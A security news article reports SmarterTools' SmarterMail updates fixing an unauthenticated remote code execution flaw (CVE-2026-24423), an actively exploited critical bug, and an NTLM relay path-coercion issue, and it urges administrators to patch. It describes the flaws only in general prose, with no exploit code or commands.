SmarterTools has released security updates for its SmarterMail email platform, addressing multiple vulnerabilities, including a critical unauthenticated remote code execution flaw that could allow attackers to run arbitrary commands on affected systems.
The most severe issue is tracked as CVE-2026-24423 and carries a CVSS score of 9.3, indicating a high risk to unpatched deployments.
Unauthenticated RCE via ConnectToHub API
According to the official CVE description, SmarterMail versions prior to Build 9511 contain an unauthenticated remote code execution vulnerability in the ConnectToHub API method.
An attacker can exploit the flaw by directing SmarterMail to a malicious HTTP server that delivers a crafted operating system command. Once retrieved, the command is executed by the vulnerable application without requiring authentication, leading to full system compromise.
The vulnerability was discovered and responsibly disclosed by researchers from watchTowr, CODE WHITE GmbH, and VulnCheck, including Sina Kheirkhah, Piotr Bazydlo, Markus Wulftange, and Cale Black.
Additional Critical Vulnerability Under Active Exploitation
SmarterTools confirmed that Build 9511, released on January 15, 2026, also fixes another critical issue tracked as CVE-2026-23760, which also carries a CVSS score of 9.3. This second flaw has already been observed under active exploitation in real world attacks, increasing the urgency for administrators to apply updates.
Medium Severity NTLM Relay Risk Identified
In addition to the critical flaws, SmarterTools addressed a medium severity vulnerability, CVE-2026-25067, rated CVSS 6.9, which could be abused to perform NTLM relay attacks and unauthorized network authentication.
The issue stems from unauthenticated path coercion in the background of the day preview endpoint. The application decodes attacker controlled Base64 input and uses it as a filesystem path without proper validation.
On Windows systems, this behavior allows UNC paths to be resolved, forcing the SmarterMail service to initiate outbound SMB authentication requests to attacker controlled servers. This can be exploited for credential coercion, NTLM relay attacks, and lateral movement within enterprise networks.
VulnCheck noted that this vulnerability significantly increases risk in Windows based environments where NTLM authentication is still enabled.
Patch Availability and Security Guidance
The NTLM relay vulnerability has been patched in Build 9518, released on January 22, 2026. With multiple SmarterMail vulnerabilities actively exploited in recent days, SmarterTools strongly advises users to upgrade to the latest available version immediately.
Organizations running SmarterMail instances exposed to the internet are urged to treat these updates as a priority to prevent unauthorized access, system compromise, and credential theft.
Found this article interesting? Follow us on X (Twitter) , Facebook, Blue sky and LinkedIn to read more exclusive content we post.
